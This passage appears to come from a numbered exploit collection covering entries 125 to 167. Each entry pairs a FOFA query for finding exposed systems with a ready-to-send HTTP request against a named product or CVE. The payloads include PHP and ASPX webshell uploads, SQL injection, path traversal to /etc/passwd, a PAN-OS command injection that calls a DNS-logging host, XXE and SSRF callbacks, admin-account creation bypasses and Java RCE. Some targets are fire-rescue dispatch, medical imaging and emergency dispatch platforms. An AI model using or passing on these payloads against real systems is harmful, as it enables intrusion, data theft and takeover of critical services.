Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

(Entry 187 below gives a time-based payload for the same CVE.)

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then access the uploaded handler:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitr ary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (the ../ segments in the example walk up to the web root so the file is reachable at the URL in step 2) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: visit http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan (慧校园 / 安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统, LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
